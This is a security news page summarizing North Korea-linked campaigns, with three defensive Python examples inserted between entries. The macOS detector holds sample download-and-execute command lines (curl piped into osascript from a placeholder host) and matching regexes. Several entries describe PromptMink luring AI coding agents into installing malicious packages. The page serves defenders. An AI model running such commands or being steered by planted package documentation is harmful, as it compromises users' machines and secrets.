ciso brief

All news with #north korea nexus tag

108 articles

ESET APT Activity Report Q4 2025–Q1 2026

📄 ESET summarizes notable APT activity observed between October 2025 and March 2026, highlighting China-, Iran-, North Korea-, and Russia-aligned operations alongside unattributed clusters. The report illustrates the geopolitical drivers behind campaigns, describes new tooling and supply-chain compromises such as a trojanized axios package, and notes destructive incidents impacting critical infrastructure. ESET states that its products protect against the activity described and that the report covers only a subset of its threat intelligence.

AI-Enabled Sanctions Evasion Raises Governance Risks

🛡️ New RUSI research warns that adversaries, notably North Korea and Iran, are moving from AI-assisted to AI-enabled sanctions evasion and proliferation financing. The report highlights AI’s ability to mass-produce fraudulent documents, automate shell-company administration, and analyze blockchain flows to evade detection. Experts urge enterprises to adopt behavior-based analytics, defensive AI, stronger identity verification and updated training to counter these evolving threats.

Developer Workstations: The New High‑Value Beachhead

🔐 Three separate April reports describe unrelated threat actors independently targeting developer machines as the preferred initial-access vector. The incidents include a North Korean campaign that trojanized packages across five ecosystems, a Zig-compiled native binary that infects IDEs, and a cascading compromise chaining developer tools into credential theft. Together they illustrate how developer workstations function as credential stores, pipeline controllers and trust anchors, and why traditional endpoint controls are insufficient. Organizations must improve visibility, isolate build environments, enforce stricter controls on IDE extensions and package installs, and assign clear ownership for this distinct attack surface.

Americans Sentenced for Running Laptop Farms for DPRK

🔒 Two U.S. nationals, Matthew Isaac Knoot and Erick Ntekereze Prince, were each sentenced to 18 months in prison for operating laptop farms that enabled North Korean IT workers to fraudulently obtain remote employment at nearly 70 U.S. companies. Authorities say the defendants used stolen identities and remote desktop software to mask foreign workers as U.S.-based employees, resulting in substantial payroll fraud and remediation costs. Courts imposed prison terms, forfeitures, and restitution as part of a broader federal effort to disrupt North Korea's illicit revenue operations.

Supply-Chain Attacks Target AI Coding Agents in Registries

⚠️ ReversingLabs researchers describe an ongoing supply‑chain campaign called PromptMink that manipulates AI coding agents into installing malicious dependencies. Attackers publish bait packages with persuasive READMEs and LLM‑optimized documentation on registries like npm and PyPI to increase discovery by autonomous agents and developers. The operation, attributed to North Korea’s Famous Chollima, paired legitimate‑looking SDKs with second‑layer packages carrying infostealers, later evolving to compiled Rust add‑ons, SEAs, SSH backdoors, and project exfiltration.

North Korean APT Trojanizes Yanbian Gaming Platform

🔎 A North Korea-aligned espionage group has trojanized Windows and Android clients on a regional Yanbian gaming site, according to ESET. The campaign, attributed to ScarCruft (APT37), delivered an Android port of the BirdCall backdoor (internally named zhuagou) and a trojanized mono.dll on Windows to deploy RokRAT and BirdCall. The malware harvests contacts, SMS, files, screenshots and audio, and routes command-and-control through cloud storage accounts.

ScarCruft Supply-Chain Delivers BirdCall to Android, Windows

⚠️ ESET reports that the North Korea‑aligned threat group ScarCruft compromised the sqgame[.]net gaming platform in a targeted supply‑chain operation to deploy the BirdCall backdoor to Android and Windows users. The compromise, active since late 2024, trojanized Android APKs for two games and delivered a malicious Windows update DLL that used RokRAT as a loader. BirdCall — an evolution of RokRAT — harvests contacts, SMS, call logs, media, screenshots, keystrokes and ambient audio, and leverages legitimate cloud services for command‑and‑control.

ScarCruft Delivers BirdCall Android Spyware via Game Site

📱 ESET researchers report that North Korean-linked APT37 (ScarCruft) developed an Android variant of the BirdCall backdoor and distributed it through trojanized APKs on the sqgame[.]net game platform. The Android implant, first seen around October 2024 and produced in at least seven variants, collects contacts, call logs, SMS, device identifiers, location and system metrics, takes periodic screenshots, records audio during evening hours, and exfiltrates targeted files to a C2. The campaign focused on users in the Yanbian region and underscores ScarCruft’s continued use of supply-chain tactics; users are advised to download apps only from official marketplaces and trusted publishers.

ScarCruft Supply-Chain Compromise Targets Yanbian Gamers

🕵️ ESET researchers uncovered a supply‑chain attack by North Korea‑aligned APT ScarCruft that trojanized a Yanbian‑focused gaming platform. The operation used a malicious Windows update to deploy RokRAT and ultimately the sophisticated BirdCall backdoor, while repackaged Android APKs contained a newly identified Android port of BirdCall. The backdoor harvests files, contacts, screenshots and ambient audio for targeted espionage.

DPRK Supply-Chain Campaign Uses AI-Inserted npm Malware

🛡️ Researchers identified an AI-assisted supply-chain campaign in which a malicious npm package, @validate-sdk/v2, entered a project as a dependency through a commit co-authored with Anthropic's Claude Opus model. ReversingLabs named the operation PromptMink and attributed it to DPRK-aligned actor Famous Chollima (aka Shifty Corsair). The tainted packages siphon crypto credentials and secrets through layered transitive dependencies and have evolved into multi-platform RATs and information stealers.

AI-Assisted Malicious npm Dependency Steals Crypto

🔍 Researchers at ReversingLabs uncovered a malicious npm dependency, @validate-sdk/v2, that exfiltrated secrets and enabled attackers to access cryptocurrency wallets after being added to an autonomous trading agent in February 2026. The commit is reported to have been co-authored by Claude Opus, and attribution points to the North Korean state-sponsored group Famous Chollima. The campaign, tracked as PromptMink, used a two-layer package strategy—public-facing Web3 utilities to attract users while secondary dependencies delivered evolving malware that scanned environment files, collected system information, compressed project data, and installed SSH keys for persistence across Linux and Windows environments.

ThreatsDay: $290M KelpDAO Heist and Supply Chain Surge

🔔 LayerZero-linked infrastructure poisoning likely enabled the North Korean-linked group TraderTraitor to steal $290M from KelpDAO: the attackers compromised the verifier's RPC nodes so that its quorum accepted falsified chain data, while a DDoS kept a third, healthy node from answering, prompting an Arbitrum Security Council freeze. At the same time, active RCE attacks, malicious npm packages delivering credential stealers and SSH backdoors, and indirect AI prompt injection payloads are accelerating breaches. The bulletin also flags covert browser access by desktop AI apps, a surge in commodified malware, SIM-farm services, and persistent exploitation of long-known weaknesses; the practical remedies remain patch early, verify dependencies, and restrict implicit trust.

Detecting Cloud Identity Infiltration via Fake Hires

🔍 Microsoft observed North Korea-aligned actors posing as legitimate hires—using stolen or fabricated identities and generative AI—to gain trusted access to corporate SaaS. They target external career sites and Workday Recruiting APIs (hrrecruiting/*) to submit convincing applications, complete onboarding, then use legitimate accounts to access Teams, SharePoint, OneDrive, and Exchange Online. Defenders should correlate multi-source telemetry, enable Microsoft Defender for Cloud Apps connectors, and monitor behavioral anomalies in candidates and new hires.

North Korea-Linked Lazarus Suspected in $290M KelpDAO Heist

🔒 State-backed North Korean actors are the primary suspects in a roughly $293m theft from KelpDAO, which paused operations after detecting suspicious cross-chain activity involving rsETH. Attackers exploited LayerZero verifier infrastructure by poisoning downstream RPCs, swapping op-geth binaries and executing an RPC‑spoofing attack to forge a cross-chain message. They routed stolen funds through Tornado Cash, while Arbitrum's Security Council has frozen about 30,766 ETH (~$71m). LayerZero contends KelpDAO ran a single-DVN configuration against best practices; KelpDAO blames LayerZero's infrastructure.

KelpDAO Hit by $290M Heist, Lazarus Group Suspected

🔒 KelpDAO reported a cross-chain exploit on April 18 that resulted in the theft of roughly 116,500 rsETH (about $293 million), funds which were then routed through Tornado Cash. The attacker compromised the verifier's RPC nodes in the DVN layer, feeding falsified chain data while DDoS-ing healthy nodes to force reliance on poisoned endpoints and accept a forged cross-chain message. LayerZero, Unichain and partners assisted in the investigation, which attributed the operation to the state-sponsored Lazarus Group, and KelpDAO paused rsETH contracts across Ethereum mainnet and L2s.
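The verifier failure described in the three KelpDAO entries above is easier to reason about with a small model. The following Python is an added illustration, not LayerZero or KelpDAO code; it assumes a simplified verifier that attests to a cross-chain message when every RPC node it can reach confirms the message, and an application that accepts a message only when all of its configured verifiers attest. The node names, message ids and the fail-closed policy are constructed for the example.

```python
from dataclasses import dataclass


@dataclass
class RpcNode:
    """One RPC endpoint a verifier queries for source-chain state (constructed model)."""
    name: str
    view: set               # message ids this endpoint claims exist on the source chain
    available: bool = True  # False models an endpoint knocked out by DDoS

    def confirms(self, msg_id):
        """True/False if the node answers, None if it is unreachable."""
        if not self.available:
            return None
        return msg_id in self.view


@dataclass
class Verifier:
    """A DVN-style verifier: attests when the RPC nodes it can reach agree."""
    name: str
    nodes: list
    fail_closed: bool = False  # if True, an unreachable node blocks attestation

    def attests(self, msg_id):
        answers = [node.confirms(msg_id) for node in self.nodes]
        responded = [a for a in answers if a is not None]
        if not responded:
            return False
        if self.fail_closed and len(responded) < len(self.nodes):
            return False  # do not let availability lower the quorum
        return all(responded)


def app_accepts(verifiers, msg_id):
    """The receiving application executes a message only if every configured verifier attests."""
    return all(v.attests(msg_id) for v in verifiers)


def build_nodes(ddos_healthy_node):
    """Two RPC sets: DVN-A has two poisoned nodes and one honest node; DVN-B is untouched."""
    truth = {"legit-msg"}                 # what the source chain really contains
    poisoned = truth | {"forged-msg"}     # attacker-controlled view adds a fake message
    a_nodes = [
        RpcNode("a1", poisoned),
        RpcNode("a2", poisoned),
        RpcNode("a3", truth, available=not ddos_healthy_node),
    ]
    b_nodes = [RpcNode("b1", truth), RpcNode("b2", truth), RpcNode("b3", truth)]
    return a_nodes, b_nodes


def run_scenarios():
    """Compare verifier/app configurations against the forged and the legitimate message."""
    a_quiet, _ = build_nodes(ddos_healthy_node=False)
    a_nodes, b_nodes = build_nodes(ddos_healthy_node=True)
    dvn_a_before_ddos = Verifier("DVN-A", a_quiet)
    dvn_a = Verifier("DVN-A", a_nodes)
    dvn_a_strict = Verifier("DVN-A fail-closed", a_nodes, fail_closed=True)
    dvn_b = Verifier("DVN-B independent", b_nodes)
    return {
        # honest node still reachable: its dissent blocks the forgery
        "single_dvn_forged_no_ddos": app_accepts([dvn_a_before_ddos], "forged-msg"),
        # the incident pattern: honest node silenced, poisoned nodes agree
        "single_dvn_forged": app_accepts([dvn_a], "forged-msg"),
        "single_dvn_legit": app_accepts([dvn_a], "legit-msg"),
        # fail-closed verifier rejects the forgery but also stalls legitimate traffic
        "fail_closed_forged": app_accepts([dvn_a_strict], "forged-msg"),
        "fail_closed_legit": app_accepts([dvn_a_strict], "legit-msg"),
        # a second, independent verifier sees the truth and vetoes the forgery
        "two_dvns_forged": app_accepts([dvn_a, dvn_b], "forged-msg"),
        "two_dvns_legit": app_accepts([dvn_a, dvn_b], "legit-msg"),
    }


if __name__ == "__main__":
    for scenario, accepted in run_scenarios().items():
        print(f"{scenario:28s} accepted={accepted}")
```

The model makes the trade-off explicit: with the honest node reachable, its dissent blocks the forged message, which is why the attacker needed the DDoS. A fail-closed verifier on its own only converts the forgery into a denial of service and would still fall if all three endpoints were poisoned, whereas a second verifier with independent RPC sources removes the single point of failure that a single-DVN configuration leaves in place.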

US Nationals Jailed for Facilitating North Korean IT Scam

🔒 Two US nationals were sentenced after admitting they helped operate a scheme that placed North Korean remote IT workers into roles at more than 100 US organisations, including several Fortune 500 firms. Court filings say Kejia Wang (42) and Zhenxing Wang (39) used the stolen identities of at least 80 Americans, received laptops at their US addresses, provided remote access to DPRK-based operators and set up shell companies to launder payments to DPRK. They received prison terms of 108 and 92 months respectively after pleading guilty to conspiracy charges including wire fraud and money laundering; Zhenxing Wang also pleaded guilty to conspiracy to commit identity theft.

Sapphire Sleet macOS Intrusion via Social Engineering

⚠️ Microsoft Threat Intelligence describes a macOS campaign by the North Korea‑linked actor Sapphire Sleet that relies on social engineering instead of software exploits. The actor impersonated a legitimate update and lured victims to open a compiled AppleScript (.scpt) in Script Editor, then used cascading curl | osascript stages to deploy Mach‑O backdoors, harvest credentials, and exfiltrate cryptocurrency and personal data. Apple and Microsoft deployed protections and detections; defenders should block unsigned .scpt files and monitor curl/osascript chains.
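The detection advice in this entry, monitoring curl/osascript chains, can be expressed as a small process-tree check. The following Python is an added example, not Microsoft's or Apple's detection logic; it runs three rules over constructed process-creation events (the JSON fields, pids and the update.example.invalid URLs are made up for the example): curl output piped directly into osascript, curl followed by osascript in one shell command, and curl or osascript running beneath a Script Editor session.

```python
import json
import re

# Constructed sample process-creation events, one JSON object per line.
# They are not real telemetry; the malicious branch models the chain the
# article describes: a .scpt opened in Script Editor spawns a shell that
# fetches the next stage with curl and hands it straight to osascript.
SAMPLE_EVENTS = r"""
{"pid": 400, "ppid": 1,   "name": "Terminal",      "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"}
{"pid": 401, "ppid": 400, "name": "osascript",     "cmdline": "osascript -e display notification \"build done\""}
{"pid": 500, "ppid": 1,   "name": "Script Editor", "cmdline": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"}
{"pid": 501, "ppid": 500, "name": "sh",            "cmdline": "sh -c curl -fsSL http://update.example.invalid/stage1 | osascript"}
{"pid": 502, "ppid": 501, "name": "curl",          "cmdline": "curl -fsSL http://update.example.invalid/stage1"}
{"pid": 503, "ppid": 501, "name": "osascript",     "cmdline": "osascript"}
{"pid": 504, "ppid": 503, "name": "sh",            "cmdline": "sh -c curl -fsSL http://update.example.invalid/stage2 -o /tmp/.u && osascript /tmp/.u"}
"""

# Rule 1: curl output piped directly into osascript (nothing touches disk).
PIPED = re.compile(r"\bcurl\b[^|;&]*\|\s*osascript\b")
# Rule 2: curl downloads a file and osascript runs it in the same shell command.
CHAINED = re.compile(r"\bcurl\b.*?(?:&&|;)\s*osascript\b")
# Rule 3: network or script interpreters spawned beneath a .scpt editor session.
INTERESTING_CHILDREN = {"curl", "osascript"}
LURE_PARENT = "Script Editor"


def parse_events(text):
    """Parse JSON-lines process events into a pid -> event dict."""
    events = {}
    for line in text.splitlines():
        line = line.strip()
        if line:
            ev = json.loads(line)
            events[ev["pid"]] = ev
    return events


def ancestors(events, pid):
    """Yield ancestor process names, walking ppid links until the root."""
    seen = set()
    cur = events.get(pid)
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        cur = events.get(cur["ppid"])
        if cur is not None:
            yield cur["name"]


def analyze(text):
    """Return a list of findings {pid, rule, cmdline}; one rule per event, strongest first."""
    events = parse_events(text)
    findings = []
    for ev in events.values():
        cmd = ev["cmdline"]
        if PIPED.search(cmd):
            findings.append({"pid": ev["pid"], "rule": "curl_piped_to_osascript", "cmdline": cmd})
        elif CHAINED.search(cmd):
            findings.append({"pid": ev["pid"], "rule": "curl_then_osascript", "cmdline": cmd})
        elif ev["name"] in INTERESTING_CHILDREN and LURE_PARENT in ancestors(events, ev["pid"]):
            findings.append({"pid": ev["pid"], "rule": "spawned_under_script_editor", "cmdline": cmd})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"pid={f['pid']:<5} {f['rule']:30s} {f['cmdline']}")
```

The benign osascript launched from Terminal (pid 401) is not flagged, while every process in the Script Editor branch is, which is the shape to look for: the first two rules catch the staging command line itself, and the third catches the children even when the shell command has been obfuscated beyond what the regexes recognise.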

U.S. Nationals Sent to Prison for Assisting DPRK IT Hires

🔒 Two U.S. nationals were sentenced to prison for facilitating a scheme that placed North Korean IT workers as faux U.S. employees at more than 100 American companies, including Fortune 500 firms. Between 2021 and October 2024 the pair generated over $5 million for DPRK-linked operations and caused roughly $3 million in corporate losses by using the stolen identities of more than 80 U.S. citizens. They set up shell companies, fake websites, bank accounts, and even hosted company-issued laptops in U.S. homes to mask the remote workers' true locations.

APT37 Uses Facebook Social Engineering to Spread RokRAT

🔒 North Korea–linked APT37 has been observed using Facebook friend requests and Messenger to build trust with targets before moving conversations to Telegram and distributing a ZIP archive containing a trojanized Wondershare PDFelement. The tampered installer executes encrypted shellcode that contacts a compromised legitimate site, japanroom[.]com, to fetch a seemingly benign JPG which stages the RokRAT payload. The malware then leverages Zoho WorkDrive for command-and-control, enabling screenshots, remote command execution via cmd.exe, host reconnaissance, and evasion of security products.

N. Korea-linked Campaign Pushes 1,700 Malicious Packages

🔒 Socket Security researchers say the North Korea-linked campaign known as Contagious Interview has published more than 1,700 malicious packages across npm, PyPI, Go, Rust and Packagist. The packages impersonate legitimate developer tooling and act as loaders that fetch platform-specific malware with infostealer and RAT capabilities. A Windows variant delivered through license-utils-kit behaves as a full implant, enabling command execution, keystroke logging, browser and wallet theft, file exfiltration and remote access via AnyDesk.
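The two-layer package pattern in the PromptMink entries above and the loader packages in this entry both show up in a lockfile as packages nobody added on purpose. The following Python is an added example, not code from ReversingLabs or Socket; it diffs two npm lockfiles (version 2 or 3, which carry a packages map with hasInstallScript, resolved and integrity fields) and flags newly added packages that are transitive, run install scripts, resolve from an unexpected host, or lack an integrity hash. The two lockfiles and every package name in them are constructed for the example.

```python
import json
from urllib.parse import urlparse

TRUSTED_HOSTS = {"registry.npmjs.org"}

# Constructed lockfiles (npm lockfileVersion 3). The "after" state models a
# two-layer pattern: a plausible-looking direct dependency pulls in a second
# package with an install script, which in turn pulls a tarball from outside
# the registry with no integrity hash. None of these packages are real.
LOCK_BEFORE = json.dumps({
    "name": "trading-agent", "lockfileVersion": 3,
    "packages": {
        "": {"name": "trading-agent", "dependencies": {"ethers": "^6.13.0"}},
        "node_modules/ethers": {
            "version": "6.13.0",
            "resolved": "https://registry.npmjs.org/ethers/-/ethers-6.13.0.tgz",
            "integrity": "sha512-constructed-example-hash",
        },
    },
})

LOCK_AFTER = json.dumps({
    "name": "trading-agent", "lockfileVersion": 3,
    "packages": {
        "": {"name": "trading-agent",
             "dependencies": {"ethers": "^6.13.0", "example-web3-utils": "^1.2.0"}},
        "node_modules/ethers": {
            "version": "6.13.0",
            "resolved": "https://registry.npmjs.org/ethers/-/ethers-6.13.0.tgz",
            "integrity": "sha512-constructed-example-hash",
        },
        "node_modules/example-web3-utils": {
            "version": "1.2.0",
            "resolved": "https://registry.npmjs.org/example-web3-utils/-/example-web3-utils-1.2.0.tgz",
            "integrity": "sha512-constructed-example-hash",
            "dependencies": {"example-validate-core": "^0.4.1"},
        },
        "node_modules/example-validate-core": {
            "version": "0.4.1",
            "resolved": "https://registry.npmjs.org/example-validate-core/-/example-validate-core-0.4.1.tgz",
            "integrity": "sha512-constructed-example-hash",
            "hasInstallScript": True,
            "dependencies": {"example-native-addon": "0.1.0"},
        },
        "node_modules/example-native-addon": {
            "version": "0.1.0",
            "resolved": "https://cdn.example.invalid/addon-0.1.0.tgz",
        },
    },
})


def load_packages(lock_text):
    """Return the packages map of an npm lockfile (v2/v3 only)."""
    lock = json.loads(lock_text)
    if lock.get("lockfileVersion", 0) < 2:
        raise ValueError("lockfileVersion 1 has no packages map; regenerate with a current npm")
    return lock["packages"]


def package_name(path):
    """'node_modules/@scope/pkg' or nested '.../node_modules/pkg' -> package name."""
    return path.rsplit("node_modules/", 1)[-1]


def audit_lockfile_change(before_text, after_text, trusted_hosts=TRUSTED_HOSTS):
    """Flag every package added between two lockfile states."""
    before = load_packages(before_text)
    after = load_packages(after_text)
    root = after.get("", {})
    direct = set(root.get("dependencies", {})) | set(root.get("devDependencies", {}))
    names_after = {package_name(p): meta for p, meta in after.items() if p}

    findings = {}
    for path, meta in after.items():
        if not path or path in before:
            continue  # root entry, or a package that was already present
        name = package_name(path)
        flags = []
        if name not in direct:
            flags.append("transitive")
        if meta.get("hasInstallScript"):
            flags.append("install_script")
        host = urlparse(meta.get("resolved", "")).hostname
        if host not in trusted_hosts:
            flags.append(f"untrusted_source:{host}")
        if not meta.get("integrity"):
            flags.append("no_integrity")
        pulled_in_by = sorted(
            parent for parent, pmeta in names_after.items()
            if name in pmeta.get("dependencies", {})
        )
        findings[name] = {"version": meta.get("version"), "flags": flags, "pulled_in_by": pulled_in_by}
    return findings


def needs_review(findings):
    """Names of added packages with at least one flag, most flags first."""
    flagged = [(name, f) for name, f in findings.items() if f["flags"]]
    return [name for name, f in sorted(flagged, key=lambda nf: -len(nf[1]["flags"]))]


if __name__ == "__main__":
    report = audit_lockfile_change(LOCK_BEFORE, LOCK_AFTER)
    for name in needs_review(report):
        print(name, report[name])
```

Run it in CI against the lockfile from the base branch and the one in the pull request. The transitive plus install_script combination is the shape of the second-layer package described above, and an untrusted host with no integrity hash means npm cannot verify what it fetched at all. Setting ignore-scripts=true in .npmrc stops the install hook from running in the first place; this check tells you it was there.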